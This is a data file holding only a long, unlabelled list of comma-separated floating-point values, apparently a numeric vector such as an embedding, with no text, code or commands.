-0.0019761784933507442, 0.0013199241366237402, -0.022320065647363663, -0.0009686240809969604, -0.017055200412869453, -0.024440841749310493, -0.026131531223654747, -0.0385892428457737, -0.0021022388245910406, 0.015015991404652596, 0.01790054515004158, 0.0066144512966275215, -0.0037373132072389126, 0.011849655769765377, -0.008001113310456276, -0.036157023161649704, 0.01494925282895565, 0.012457710690796375, -0.009380360133945942, 0.015030821785330772, 0.015794597566127777, 0.008416370488703251, 0.014333782717585564, 0.0041970619931817055, 0.008431200869381428, -0.005624508019536734, 0.0014228115323930979, -0.030462069436907768, -0.008853873237967491, -0.0280150193721056, 0.007152060978114605, 0.002463734708726406, -0.032093435525894165, 0.0332205630838871, -0.025864580646157265, 0.024381520226597786, 0.01647680625319481, -0.012880383059382439, -0.027288319543004036, -0.006877694744616747, 0.030106134712696075, -0.008868703618645668, 0.00969180278480053, -0.009031840600073338, -0.021741671487689018, -0.007322612684220076, 0.010173797607421875, -0.007778653874993324, 0.01192380953580141, -0.007344858720898628, 0.000041508323192829266, -0.014118739403784275, 0.02375863492488861, -0.0019001717446371913, 0.008876118808984756, 0.012991612777113914, -0.058669887483119965, -0.004912639036774635, 0.03206377476453781, -0.021207770332694054, 0.01125643216073513, 0.02344719134271145, 0.0205700546503067, 0.02478194609284401, -0.036334991455078125, -0.003012467408552766, -0.03440701216459274, 0.01643231324851513, 0.011634612455964088, -0.02316541038453579, 0.02500440552830696, -0.015764936804771423, -0.004082125145941973, 0.009076332673430443, 0.008890950120985508, -0.03236038610339165, 0.030165458098053932, -0.01790054515004158, -0.008890950120985508, -0.017885712906718254, 0.030328594148159027, -0.006566252093762159, 0.005950781516730785, -0.02961672469973564, 0.025671783834695816, 0.01317699532955885, -0.044313859194517136, -0.02731798030436039, -0.009439682587981224, -0.014103909023106098, -0.011879317462444305, 0.01504565216600895, -0.011271262541413307, 0.030936649069190025, -0.011286092922091484, -0.005442833062261343, 0.0257459357380867, -0.013006443157792091, 0.005187005270272493, 0.0013004590291529894, -0.001259674783796072, -0.019413266330957413, 0.0020114013459533453, 0.0015646291431039572, -0.018197156488895416, 0.0071038613095879555, 0.0033850863110274076, -0.040576543658971786, 0.010856005363166332, -0.027392134070396423, 0.014838024042546749, 0.012235252186655998, 0.00872039794921875, -0.0006330815958790481, -0.017277657985687256, -0.01610604114830494, 0.008609168231487274, 0.009810447692871094, -0.005057237576693296, 0.012376142665743828, -0.00202437792904675, -0.008876118808984756, -0.029883675277233124, 0.04369097203016281, -0.015119805000722408, -0.01661028154194355, -0.02639848366379738, -0.02611670084297657, 0.001346804667264223, -0.035415492951869965, -0.014356029219925404, -0.017841221764683723, -0.007689670659601688, -0.0008847384597174823, 0.020006490871310234, 0.03221208229660988, 0.003145942697301507, 0.026976875960826874, -0.02629466913640499, 0.02168234996497631, -0.030120965093374252, -0.017737407237291336, 0.017648423090577126, -0.012390973046422005, 0.03977569192647934, 0.020406916737556458, -0.006992632057517767, 0.006677481345832348, 0.031856145709753036, 0.011894147843122482, -0.01965055614709854, -0.03971637040376663, 0.023313716053962708, -0.0055948467925190926, -0.018123002722859383, 0.0034926082007586956, 0.02145989052951336, -0.021059464663267136, -0.0022616677451878786, -0.01259860210120678, -0.015512816607952118, -0.02325439453125, -0.0019150023581460118, 0.025360340252518654, -0.0038967423606663942, 0.017544610425829887, -0.02708069048821926, 0.021252261474728584, 0.013228902593255043, -0.03055105358362198, 0.0028085464145988226, -0.03755110129714012, -0.02524169534444809, 0.014622979797422886, 0.017589101567864418, -0.0003526904038153589, -0.034080736339092255, -0.028593413531780243, 0.04398758336901665, 0.018389955163002014, -0.008535015396773815, -0.026798909530043602, 0.012331650592386723, -0.016906892880797386, -0.005542939994484186, -0.024574318900704384, -0.022868799045681953, 0.016921723261475563, -0.011412153020501137, -0.001780599937774241, 0.044135890901088715, 0.0010789267253130674, 0.006362331099808216, 0.022764984518289566, 0.007381935138255358, 0.007986282929778099, -0.00016869817045517266, -0.039241790771484375, -0.03055105358362198, -0.013006443157792091, -0.045707933604717255, 0.0025545721873641014, -0.01133058499544859, 0.024618810042738914, 0.0007707281620241702, 0.014103909023106098, -0.012109192088246346, 0.018167495727539062, 0.008453446440398693, -0.02214209921658039, -0.033606160432100296, 0.0027529317885637283, -0.004942300263792276, -0.008245818316936493, -0.006818372290581465, -0.011323169805109501, -0.0010919035412371159, -0.011226770468056202, 0.01726282760500908, 0.008453446440398693, -0.01711452193558216, 0.0076229325495660305, -0.025078559294342995, -0.029750199988484383, -0.02347685396671295, 0.012695000506937504, 0.03995366021990776, 0.0038967423606663942, -0.015497985295951366, 0.009973583742976189, 0.0003617278125602752, -0.022112436592578888, -0.018760720267891884, -0.03953840211033821, -0.04137739911675453, -0.019902676343917847, -0.003563053673133254, -0.008505353704094887, -0.03327988460659981, 0.02303193509578705, -0.019724709913134575, -0.011871902272105217, 0.03150021284818649, 0.040902819484472275, 0.027555270120501518, 0.04188163951039314, -0.0071075689047575, -0.008067850954830647, -0.011278677731752396, 0.026131531223654747, -0.030150627717375755, 0.010670622810721397, -0.012287159450352192, -0.01540900208055973, -0.006684896536171436, 0.006925893947482109, 0.005509571172297001, 0.04042823985219002, -0.003933819010853767, 0.05158085748553276, 0.007311489898711443, -0.028385784476995468, -0.016803080216050148, -0.01133058499544859, 0.004734671674668789, 0.012101776897907257, 0.060746170580387115, -0.010551977902650833, -0.012568940408527851, -0.02708069048821926, 0.01877555064857006, 0.017173845320940018, -0.006725681014358997, -0.0033739632926881313, 0.004241554066538811, -0.001127126277424395, 0.012020207941532135, -0.04327571392059326, 0.033517174422740936, 0.002117069438099861, -0.016461975872516632, -0.010551977902650833, -0.014860269613564014, -0.022409049794077873, -0.00936552882194519, 0.002930898917838931, 0.023788295686244965, -0.010648377239704132, -0.014356029219925404, 0.013028689660131931, 0.028489599004387856, 0.027718406170606613, -0.02994299866259098, 0.004693887662142515, -0.01748528704047203, -0.025998055934906006, 0.013458777219057083, -0.020199289545416832, -0.00159150967374444, 0.0017546463059261441, -0.03378412500023842, 0.014215137809515, 0.029587063938379288, 0.02768874540925026, -0.010685453191399574, 0.003398063126951456, -0.017455626279115677, 0.0029420219361782074, 0.0033053718507289886, 0.019680216908454895, -0.005998981185257435, -0.004630857612937689, 0.014986329711973667, 0.009217223152518272, 0.01938360556960106, -0.006818372290581465, -0.0044417669996619225, 0.00998841505497694, -0.0003373963409103453, -0.010544562712311745, 0.01772257685661316, -0.024514995515346527, -0.023180240765213966, 0.014155815355479717, 0.03179682418704033, 0.012880383059382439, -0.040072303265333176, -0.031856145709753036, 0.00018851093773264438, 0.0024785653222352266, 0.008750058710575104, -0.007493164855986834, 0.017084861174225807, 0.008512768894433975, 0.019769201055169106, -0.015631461516022682, 0.05944107845425606, -0.027510778978466988, -0.00869815144687891, -0.00024007046886254102, 0.003700236789882183, -0.0007883395301178098, 0.008067850954830647, -0.0018380684778094292, -0.011960885487496853, -0.031440891325473785, 0.008957687765359879, -0.018108172342181206, -0.0481698177754879, -0.006588497664779425, -0.004560411907732487, 0.024945084005594254, -0.026784079149365425, 0.007882468402385712, -0.00043866157648153603, 0.005305650178343058, -0.009291375987231731, -0.004805116914212704, 0.02089632675051689, -0.0201251357793808, 0.02463364042341709, -0.011352830566465855, -0.04143672063946724, -0.0036334991455078125, -0.01229457464069128, -0.01997683010995388, -0.01661028154194355, -0.013925941661000252, -0.04636048153042793, 0.013584837317466736, 0.011864487081766129, -0.012613432481884956, 0.015290357172489166, -0.003418455133214593, -0.018523430451750755, -0.033665481954813004, -0.0031663349363952875, 0.0020911158062517643, -0.022824306041002274, 0.01919080689549446, 0.04022061079740524, 0.09622098505496979, 0.0030013443902134895, -0.0012791400076821446, -0.016803080216050148, 0.009654725901782513, 0.0025897950399667025, 0.028637904673814774, 0.0028604536782950163, 0.00923205353319645, 0.04291978105902672, -0.0032275111880153418, -0.00008782500663073733, 0.016165362671017647, -0.0029828061815351248, 0.00186309521086514, -0.010722530074417591, -0.018716227263212204, -0.007934375666081905, 0.016639942303299904, -0.017099691554903984, -0.011627197265625, 0.01160495076328516, 0.012153683230280876, -0.012242667376995087, 0.0010214581852778792, -0.013414285145699978, -0.00355934607796371, -0.020777681842446327, -0.03129258379340172, -0.018671736121177673, -0.0010761460289359093, -0.0253306794911623, -0.006777587812393904, 0.006395699921995401, 0.008809381164610386, 0.02196413092315197, 0.008609168231487274, -0.0009171804413199425, -0.016684435307979584, 0.004078417085111141, -0.004159985575824976, -0.0060953800566494465, -0.030120965093374252, -0.008015943691134453, 0.012331650592386723, -0.033843446522951126, 0.021341245621442795, 0.017292490229010582, -0.007756408303976059, 0.010092228651046753, -0.010136720724403858, -0.020495900884270668, 0.03090698830783367, 0.03236038610339165, 0.013510684482753277, 0.014244799502193928, 0.002332113217562437, -0.008979933336377144, -0.034080736339092255, -0.02030310221016407, 0.014585902914404869, 0.010603885166347027, -0.00018248600827064365, 0.026784079149365425, -0.010114475153386593, -0.013132504187524319, -0.007637763395905495, 0.029082823544740677, -0.01407424733042717, 0.03855958208441734, -0.0016035594744607806, 0.020733190700411797, -0.017411135137081146, 0.001094684237614274, -0.006102795246988535, 0.03867822512984276, -0.007407888770103455, 0.014407936483621597, -0.027570100501179695, 0.009513835422694683, 0.003310933243483305, 0.030462069436907768, 0.0014682302717119455, 0.018063681200146675, -0.00756731815636158, 0.028118833899497986, -0.009869770146906376, -0.01864207535982132, -0.012413219548761845, -0.005861797835677862, 0.01146406028419733, 0.006232562940567732, 0.033606160432100296, 0.024203553795814514, 0.011790333315730095, 0.035504475235939026, -0.002878991886973381, -0.019576402381062508, -0.002359920646995306, -0.011278677731752396, 0.010715114884078503, -0.00982527807354927, 0.03072902001440525, -0.0030551052186638117, -0.017292490229010582, -0.0018705105176195502, 0.009736294858157635, 0.006202902179211378, 0.005353849846869707, -0.016402652487158775, -0.04888168349862099, -0.0003862910089083016, 0.016031887382268906, -0.020095475018024445, -0.012264912948012352, 0.0031107200775295496, 0.007330028340220451, -0.00532789621502161, 0.0016804933547973633, -0.01979886181652546, -0.01726282760500908, -0.006102795246988535, 0.04659777134656906, -0.011471475474536419, -0.001480280072428286, 0.004074709489941597, 0.009306206367909908, -0.020495900884270668, 0.03307225555181503, 0.033754464238882065, 0.011441814713180065, 0.012124022468924522, 0.00922463834285736, 0.0019391020759940147, 0.030847664922475815, -0.016758587211370468, 0.02380312606692314, -0.0013727581826969981, -0.004908931441605091, -0.01965055614709854, -0.009328452870249748, 0.029750199988484383, 0.020614545792341232, 0.029868844896554947, -0.013896279968321323, -0.008245818316936493, -0.00525003531947732, 0.0071075689047575, 0.020095475018024445, 0.0045678275637328625, -0.018627244979143143, -0.012650509364902973, 0.026873063296079636, 0.023936601355671883, -0.01504565216600895, 0.008868703618645668, 0.03244937211275101, -0.020510731264948845, 0.0016536128241568804, -0.006937017198652029, 0.013451362028717995, 0.0072929514572024345, 0.021578535437583923, -0.01794503629207611, 0.004119201563298702, 0.008750058710575104, -0.0014274460263550282, -0.044640131294727325, -0.014133569784462452, -0.010388840921223164, 0.015453494153916836, -0.0015312603209167719, -0.02043657749891281, 0.01160495076328516, 0.010433332994580269, -0.0008583214366808534, -0.03387311100959778, -0.004293461330235004, 0.01615053229033947, 0.00028178156935609877, 0.0043231225572526455, 0.019917506724596024, 0.012546694837510586, 0.00989943090826273, 0.01767808571457863, -0.0201251357793808, 0.009558327496051788, 0.01213143765926361, -0.04010196402668953, -0.005524401552975178, 0.0024173890706151724, 0.03497057408094406, -0.028667565435171127, -0.005409464240074158, -0.00409695552662015, -0.014229969121515751, 0.0016647358424961567, -0.009543496184051037, -0.00826064869761467, -0.00640311511233449, -0.017381472513079643, -0.013710897415876389, -0.0014617418637499213, 0.0015998518792912364, -0.0010492654982954264, -0.04383927956223488, -0.0016267324099317193, 0.0044825514778494835, -0.008312555961310863, -0.003229364985600114, -0.014786116778850555, 0.02002132125198841, 0.009469343349337578, 0.0034963160287588835, -0.020777681842446327, 0.03710618242621422, 0.02312091924250126, -0.03847059980034828, -0.00849052332341671, 0.019917506724596024, -0.016728926450014114, -0.012450295500457287, 0.025686614215373993, -0.013466192409396172, -0.01340686995536089, -0.016313668340444565, 0.0220086220651865, -0.0184641070663929, 0.001916856155730784, 0.016921723261475563, -0.032923951745033264, 0.007912129163742065, 0.009395190514624119, 0.004308291710913181, 0.0009366456069983542, -0.020599715411663055, -0.008972518146038055, 0.01243546511977911, 0.011108125559985638, -0.0014348613331094384, 0.009180146269500256, 0.00020056081120856106, -0.00998841505497694, -0.017366642132401466, 0.0005274135037325323, -0.0002956852549687028, 0.015839090570807457, 0.010403672233223915, -0.009432266466319561, 0.022587016224861145, 0.00454558152705431, 0.006113918498158455, -0.010737360455095768, -0.00017773557920008898, 0.009550911374390125, 0.05258933827280998, -0.008008528500795364, 0.0058135986328125, 0.0373731330037117, -0.015053067356348038, 0.014229969121515751, -0.008357048034667969, -0.018419615924358368, 0.00842378567904234, -0.02237938717007637, 0.030343424528837204, -0.01294712070375681, -0.010522316209971905, 0.019665386527776718, 0.011753257364034653, 0.010818928480148315, 0.0029624139424413443, 0.01273207738995552, 0.007941790856420994, -0.024856099858880043, -0.008913195692002773, -0.016536127775907516, -0.011360245756804943, 0.0062955934554338455, 0.002684340113773942, -0.016728926450014114, 0.03565278276801109, 0.009135655127465725, -0.011019142344594002, -0.015349679626524448, -0.02137090638279915, -0.023936601355671883, 0.02358066663146019, -0.014660056680440903, -0.0018825603183358908, -0.001316216541454196, 0.0139111103489995, 0.012687585316598415, -0.025805259123444557, 0.025315849110484123, 0.013970432803034782, -0.022231081500649452, 0.03761042281985283, -0.011679104529321194, -0.014726794324815273, 0.017144182696938515, 0.03544515371322632, 0.011612365953624249, 0.01905733160674572, -0.01591324247419834, -0.0027770313899964094, 0.004975669085979462, 0.0065402984619140625, 0.006948139984160662, 0.005672707688063383, 0.005739445332437754, -0.017425965517759323, -0.01393335685133934, -0.021237431094050407, 0.0002555962710175663, -0.00569866131991148, 0.01303610485047102, -0.01222783699631691, -0.008579506538808346, -0.008386708796024323, 0.02541966363787651, 0.009610233828425407, -0.017425965517759323, -0.030669698491692543, -0.006303008645772934, 0.008208741433918476, -0.0014923299895599484, 0.014014924876391888, -0.005357557442039251, -0.02587941102683544, 0.024692963808774948, 0.025123050436377525, 0.009565742686390877, 0.0028456230647861958, 0.0016906893579289317, -0.025820089504122734, 0.004100663121789694, -0.006336377467960119, 0.0073485663160681725, -0.011382492259144783, -0.018953517079353333, 0.02301710471510887, -0.005709784105420113, 0.0022579601500183344, 0.004108078312128782, 0.0021819532848894596, 0.016536127775907516, 0.017841221764683723, 0.00450850510969758, -0.021741671487689018, -0.016817910596728325, -0.004894100595265627, -0.003281272016465664, 0.008171665482223034, 0.010781852528452873, 0.0025842334143817425, -0.009936507791280746, -0.0060508884489536285, 0.017144182696938515, -0.01280623022466898, -0.031945131719112396, -0.00372619042173028, 0.003930111415684223, -0.010403672233223915, 0.0019316867692396045, -0.00031306486926041543, -0.011375077068805695, -0.016714096069335938, -0.007341151125729084, -0.0195170808583498, -0.009476758539676666, -0.002354359021410346, 0.009536080993711948, -0.009209807962179184, -0.01116744801402092, 0.0013625621795654297, 0.031767163425683975, -0.029735369607806206, -0.024574318900704384, 0.006228855345398188, 0.008045605383813381, -0.021489551290869713, -0.0001341706665698439, 0.016195023432374, -0.01397784799337387, -0.0058951666578650475, -0.029928168281912804, 0.0294832494109869, -0.0012819207040593028, -0.007845391519367695, 0.008253233507275581, 0.010396256111562252, -0.0023988508619368076, 0.04137739911675453, 0.037669744342565536, 0.019220467656850815, 0.015260696411132812, -0.005424295086413622, -0.025256525725126266, 0.013421700336039066, 0.0020058397203683853, 0.005824721418321133, -0.0022079069167375565, 0.007530241273343563, -0.0018807065207511187, 0.009795616380870342, -0.009246883913874626, -0.0017222043825313449, 0.02943875826895237, -0.0010047737741842866, 0.014118739403784275, -0.016921723261475563, 0.008468277752399445, 0.0032256573904305696, -0.026309499517083168, -0.007600686978548765, -0.006084257271140814, 0.00895027257502079, -0.021978961303830147, 0.013925941661000252, -0.010462993755936623, 0.0028864070773124695, 0.0030495438259094954, -0.017099691554903984, 0.02279464527964592, 0.005402049049735069, -0.0030272980220615864, -0.030491730198264122, 0.00355378445237875, -0.0062955934554338455, -0.01573527604341507, 0.008772305212914944, 0.012213005684316158, 0.006688604597002268, 0.03170784190297127, -0.011508552357554436, -0.006807249039411545, -0.018582751974463463, 0.007837976329028606, -0.0020429163705557585, 0.0038003434892743826, -0.006581082474440336, 0.008312555961310863, -0.0032460493966937065, 0.00521295890212059, 0.002706585917621851, -0.014875099994242191, -0.02681373991072178, -0.015216204337775707, 0.002710293745622039, 0.03396209329366684, 0.006143579725176096, 0.0139111103489995, 0.011182278394699097, 0.0028845532797276974, 0.0018297262722626328, 0.002897530095651746, -0.004753210116177797, -0.013510684482753277, -0.0058951666578650475, 0.03363582119345665, 0.003757705446332693, 0.027970528230071068, 0.012072115205228329, 0.007530241273343563, 0.014163230545818806, 0.010907912626862526, -0.00012988368689548224, 0.004882977809756994, -0.00290679931640625, 0.0058951666578650475, 0.006102795246988535, 0.009751125238835812, 0.0039449417963624, 0.0003809612535405904, -0.010596469976007938, -0.023239564150571823, -0.027985358610749245, -0.008164250291883945, 0.008446031250059605, 0.005442833062261343, 0.027481118217110634, -0.014452427625656128, -0.0034091861452907324, -0.008364463225007057, 0.020006490871310234, -0.013584837317466736, 0.026087040081620216, 0.006280762609094381, 0.028044680133461952, -0.0012225982500240207, -0.012680170126259327, -0.0139111103489995, 0.01397784799337387, 0.011063633486628532, 0.0201251357793808, 0.00044561343383975327, 0.008208741433918476, 0.025256525725126266, -0.02412940002977848, 0.01317699532955885, -0.007771238684654236, 0.01809334196150303, -0.0019817401189357042, 0.004330537747591734, -0.002411827677860856, -0.0137034822255373, 0.0005371461156755686, 0.007660009432584047, -0.029127314686775208, 0.015216204337775707, 0.005053529981523752, -0.009684387594461441, 0.012494787573814392, 0.01595773547887802, 0.002194930100813508, -0.010136720724403858, 0.0036334991455078125, -0.037402793765068054, 0.00895027257502079, 0.0027473701629787683, 0.00461231917142868, -0.0174407958984375, -0.014734209515154362, 0.02034759521484375, 0.010722530074417591, -0.0007860222249291837, -0.006651527713984251, -0.010529732331633568, -0.011478890664875507, 0.00159150967374444, 0.0028567458502948284, -0.007174307014793158, -0.011612365953624249, 0.0013625621795654297, 0.01739630289375782, 0.015305187553167343, -0.018864532932639122, 0.0006210317369550467, -0.03378412500023842, 0.013006443157792091, -0.01997683010995388, -0.0011975716333836317, 0.008104927837848663, -0.0026101870462298393, -0.026932384818792343, 0.008483108133077621, -0.019531911239027977, -0.010833759792149067, -0.002519349567592144, 0.02349168434739113, 0.008497938513755798, 0.00021979425218887627, -0.00797886773943901, 0.0019835939165204763, 0.013080596923828125, 0.00417481642216444, -0.004675349220633507, -0.006065718829631805, 0.006002688780426979, -0.005950781516730785, -0.0020188165362924337, 0.013970432803034782, 0.019502250477671623, 0.016195023432374, -0.00878713559359312, 0.0028660150710493326, -0.0009236688492819667, 0.006080549210309982, -0.010752190835773945, -0.00925430003553629, -0.006803541444242001, 0.006243686191737652, 0.005591139197349548, 0.004363906569778919, -0.00005022709956392646, -0.0049719614908099174, -0.0033072256483137608, 0.010767022147774696, -0.002002132125198841, 0.011189693585038185, 0.00722250621765852, -0.013080596923828125, -0.013925941661000252, -0.005335311405360699, -0.0178560521453619, 0.015497985295951366, -0.025434494018554688, -0.02016962692141533, 0.001888121827505529, 0.0035463692620396614, 0.0019205637509003282, -0.011338000185787678, -0.00982527807354927, 0.0004660055274143815, -0.0057357377372682095, -0.004578950349241495, -0.009699217975139618, -0.003885619342327118, 0.028296800330281258, -0.01384437270462513, -0.005187005270272493, -0.0025842334143817425, -0.028682395815849304, -0.009684387594461441, -0.005554062779992819, 0.052263062447309494, -0.007126107346266508, -0.013013859279453754, -0.015260696411132812, -0.008712982758879662, -0.013874034397304058, -0.0028363538440316916, -0.007051954511553049, 0.002662094309926033, 0.0025008113589137793, 0.028178155422210693, 0.011849655769765377, -0.002408120082691312, -0.040813833475112915, 0.004808824975043535, 0.017366642132401466, -0.0008583214366808534, -0.013518099673092365, 0.0010270195780321956, -0.00020531124027911574, 0.005227789282798767, -0.014103909023106098, 0.017796730622649193, -0.0061695328913629055, 0.008616583421826363, 0.014615564607083797, 0.006551421247422695, 0.010781852528452873, -0.019784031435847282, 0.022913290187716484, -0.011797748506069183, 0.003585299476981163, 0.0006483756587840617, -0.005865505430847406, 0.009951338171958923, -0.010322103276848793, 0.006962970830500126, -0.003642768133431673, 0.0034666548017412424, 0.015675952658057213, 0.0039449417963624, -0.02016962692141533, -0.007063077297061682, 0.014170646667480469, 0.008142003789544106, 0.015853920951485634, -0.01548315491527319, 0.016506467014551163, 0.014496919699013233, -0.019546741619706154, -0.012680170126259327, -0.018152665346860886, 0.009402605704963207, 0.018983177840709686, 0.022913290187716484, 0.0034629469737410545, 0.0001516661432106048, 0.004578950349241495, -0.0024229506962001324, 0.004897808190435171, -0.015394171699881554, 0.0034592393785715103, 0.02034759521484375, 0.018745889887213707, -0.010678038001060486, 0.032834965735673904, 0.006325254682451487, 0.0016387822106480598, -0.006781295873224735, -0.01160495076328516, -0.00355934607796371, 0.00603235000744462, -0.008453446440398693, -0.013125088065862656, -0.00043773467768915, 0.0020985309965908527, -0.006703434977680445, -0.007674839813262224, -0.005012745503336191, -0.009165315888822079, -0.009639895521104336, -0.008505353704094887, -0.000959354976657778, -0.0053316038101911545, 0.01257635559886694, -0.00273439334705472, 0.0021800994873046875, -0.02524169534444809, -0.013184410519897938, -0.0423562191426754, -0.013948187232017517, 0.01042591780424118, 0.004293461330235004, 0.00010908607509918511, -0.004423229023814201, -0.011360245756804943, -0.001283774501644075, -0.01844927668571472, -0.008646245114505291, 0.007574733346700668, 0.01340686995536089, 0.002528618788346648, 0.0022338603157550097, -0.0021819532848894596, 0.01855309121310711, -0.001369050587527454, 0.0062103173695504665, 0.006566252093762159, 0.012072115205228329, 0.00811975821852684, 0.005005330312997103, -0.020154796540737152, 0.029824353754520416, 0.004868147429078817, -0.01844927668571472, 0.02786671370267868, 0.00257311062887311, -0.03378412500023842, 0.0027473701629787683, -0.00024841268896125257, -0.012413219548761845, -0.009602818638086319, -0.00651805242523551, 0.008134588599205017, 0.012539279647171497, 0.007163183763623238, 0.028074340894818306, 0.0001960421068361029, -0.000022709369659423828, 0.006532882805913687, 0.005168466828763485, -0.0024007046595215797, -0.015023406594991684, 0.00855726096779108, 0.026339160278439522, 0.013940772041678429, -0.0024563195183873177, 0.0027788851875811815, -0.012465125881135464, 0.020050982013344765, -0.004946007858961821, 0.0034889006055891514, -0.017322150990366936, 0.009892015717923641, -0.0008699078462086618, -0.006099087651818991, -0.003257172415032983, 0.004156277980655432, 0.0036650141701102257, 0.008112343028187752, -0.005732030142098665, -0.009476758539676666, 0.0037057981826364994, 0.0007151134195737541, 0.016506467014551163, 0.013073181733489037, 0.004790286533534527, -0.0032256573904305696, 0.0011456644861027598, 0.011545628309249878, -0.0020429163705557585, -0.014726794324815273, 0.0019391020759940147, -0.01573527604341507, -0.02943875826895237, -0.0024433427024632692, 0.020881496369838715, 0.005339019000530243, 0.008920610882341862, -0.009714048355817795, 0.006384577136486769, -0.01264309324324131, -0.011130371131002903, -0.002380312653258443, 0.005502155516296625, 0.007137230131775141, -0.0011984985321760178, 0.012257497757673264, 0.005887751467525959, -0.011871902272105217, 0.003670575562864542, 0.0023988508619368076, 0.008809381164610386, -0.0005566112813539803, -0.0011836679186671972, 0.00021261067013256252, -0.011352830566465855, -0.008564676158130169, 0.00042892899364233017, 0.0043119993060827255, -0.008876118808984756, -0.001671224134042859, 0.007367104757577181, -0.004360198974609375, 0.011085879988968372, -0.00603235000744462, -0.01139732263982296, 0.008038190193474293, 0.004857024177908897, 0.016550958156585693, -0.025582799687981606, 0.0034017707221210003, 0.007615517359226942, 0.0020651621744036674, -0.013888864777982235, 0.01766325533390045, -0.015364510007202625, 0.0003663623647298664, 0.0024526119232177734, 0.00811975821852684, 0.001449691946618259, 0.02242388017475605, 0.033517174422740936, 0.006176948547363281, 0.011486305855214596, -0.0102701960131526, -0.0027455163653939962, -0.014252214692533016, 0.008668490685522556, -0.0021152154076844454, 0.02754043973982334, -0.02076285146176815, 0.0004727256309706718, -0.01317699532955885, 0.008846458047628403, 0.0036372067406773567, 0.006740511395037174, -0.019828522577881813, -0.00543171027675271, -0.008594337850809097, -0.013822127133607864, -0.019531911239027977, -0.005442833062261343, 0.014563657343387604, -0.020881496369838715, -0.0017435234040021896, 0.016877232119441032, 0.016491636633872986, -0.004734671674668789, 0.003930111415684223, 0.023224731907248497, -0.007582148537039757, -0.008890950120985508, -0.009447097778320312, 0.021059464663267136, 0.004768040496855974, -0.0033721094951033592, 0.016758587211370468, 0.017010707408189774, -0.012109192088246346, -0.003370255697518587, -0.026265008375048637, -0.007830561138689518, -0.0032553186174482107, 0.00662186648696661, 0.0028604536782950163, 0.012405804358422756, -0.02279464527964592, -0.0028270846232771873, 0.009647310711443424, -0.017322150990366936, -0.006477268412709236, -0.004601196385920048, 0.0029142145067453384, -0.0020985309965908527, -0.007934375666081905, 0.016580620780587196, 0.009558327496051788, 0.009076332673430443, -0.015794597566127777, -0.00202993955463171, -0.023002274334430695, -0.014385689981281757, 0.004853316582739353, 0.013829542323946953, -0.0010223850840702653, 0.011249016039073467, -0.010915327817201614, -0.0007976086344569921, -0.004745794460177422, -0.006247393786907196, -0.004108078312128782, -0.01125643216073513, -0.009180146269500256, 0.009098578244447708, 0.0018371415790170431, 0.0039004499558359385, 0.032686661928892136, 0.02104463241994381, 0.007711916230618954, 0.0055763088166713715, -0.0068146646954119205, 0.008238403126597404, 0.020095475018024445, -0.01005515269935131, -0.02976503036916256, 0.0024581733159720898, 0.02768874540925026, 0.007993698120117188, 0.014155815355479717, -0.013117672875523567, -0.006662650965154171, -0.0011363953817635775, 0.012190760113298893, -0.0013875887962058187, -0.0014459843514487147, 0.0006914770929142833, 0.002274644561111927, 0.02675441838800907, 0.00989943090826273, -0.015349679626524448, -0.0029679755680263042, -0.022082775831222534, -0.0058951666578650475, 0.014622979797422886, 0.013481022790074348, -0.0155721390619874, -0.01123418565839529, 0.020199289545416832, -0.011857070960104465, -0.0033072256483137608, -0.006770172622054815, -0.00039625531644560397, -0.00989943090826273, 0.0016879086615517735, 0.009358113631606102, 0.02690272405743599, 0.02209760621190071, -0.02338786981999874, 0.008149418979883194, 0.006351207848638296, -0.0038819117471575737, -0.018063681200146675, 0.0008462715777568519, -0.00427863048389554, 0.002684340113773942, 0.007734162267297506, -0.020288271829485893, -0.027243828400969505, -0.03072902001440525, -0.00012409048213157803, 0.010811513289809227, 0.010618715547025204, -0.008001113310456276, 0.018063681200146675, 0.0053316038101911545, -0.019309451803565025, -0.005846967454999685, -0.025315849110484123, -0.018375122919678688, -0.020362425595521927, 0.0005334384622983634, 0.019250130280852318, -0.023832786828279495, -0.010396256111562252, -0.01892385631799698, 0.009676972404122353, -0.00104370410554111, 0.023462021723389626, 0.01757427118718624, -0.013733142986893654, -0.021904809400439262, 0.0013811003882437944, 0.003145942697301507, -0.001702739275060594, -0.0013078742194920778, 0.02837095409631729, -0.017336981371045113, -0.0018491914961487055, 0.014415351673960686, -0.002790008205920458, 0.002932752715423703, 0.013762804679572582, 0.001922417664900422, -0.01591324247419834, 0.004030217882245779, -0.024692963808774948, -0.015245865099132061, 0.004360198974609375, -0.020866665989160538, -0.003926403354853392, -0.0009069843799807131, 0.018493767827749252, 0.004816240165382624, -0.022498032078146935, -0.026828570291399956, 0.0078898835927248, -0.0019038793398067355, 0.026368821039795876, 0.0012930437223985791, 0.02131158486008644, 0.0010752191301435232, 0.012124022468924522, -0.025864580646157265, -0.010144135914742947, -0.006269639823585749, -0.012628262862563133, 0.003989433869719505, 0.002519349567592144, -0.00438244454562664, 0.006247393786907196, 0.013088012114167213, -0.01947258971631527, -0.004300876520574093, 0.0019279790576547384, -0.0035222694277763367, -0.019116654992103577, -0.013777635060250759, 0.04119943082332611, -0.0039523569867014885, -0.021949300542473793, 0.011567874811589718, -0.019695047289133072, -0.018419615924358368, -0.002936460543423891, 0.004022802691906691, -0.00629930105060339, -0.006165825296193361, -0.028267139568924904, -0.006799833849072456, -0.01720350608229637, -0.017826391384005547, -0.00438244454562664, -0.02561246044933796, 0.013080596923828125, 0.013295640237629414, -0.005984150338917971, 0.0032645876053720713, 0.021445060148835182, 0.0028345000464469194, -0.0024507581256330013, 0.007800899911671877, 0.009046670980751514, -0.0010585347190499306, -0.006377161480486393, -0.021741671487689018, -0.024025585502386093, 0.016536127775907516, -0.0048310705460608006, -0.022587016224861145, -0.015972565859556198, -0.014081662520766258, 0.005409464240074158, -0.0010066275717690587, -0.00014425083645619452, -0.010529732331633568, -0.023773465305566788, -0.03793669492006302, -0.006024934817105532, -0.014430182054638863, 0.016046717762947083, 0.010218288749456406, -0.0020410625729709864, 0.01280623022466898, -0.01264309324324131, -0.0199323371052742, -0.002875284291803837, 0.0006099087768234313, 0.024233214557170868, -0.004219308029860258, -0.02491542138159275, -0.0064142378978431225, -0.027703575789928436, 0.03514854237437248, 0.013154749758541584, 0.0030625206418335438, -0.01698104664683342, 0.006102795246988535, 0.004248969256877899, 0.0081939110532403, -0.016461975872516632, -0.022646339610219002, 0.006988923996686935, 0.007964036427438259, -0.019739540293812752, -0.004515920300036669, 0.013384624384343624, -0.013191825710237026, 0.012339065782725811, 0.006232562940567732, 0.0018732912139967084, 0.005843259859830141, 0.018330631777644157, 0.008853873237967491, -0.01050007063895464, 0.0015813136706128716, 0.005005330312997103, 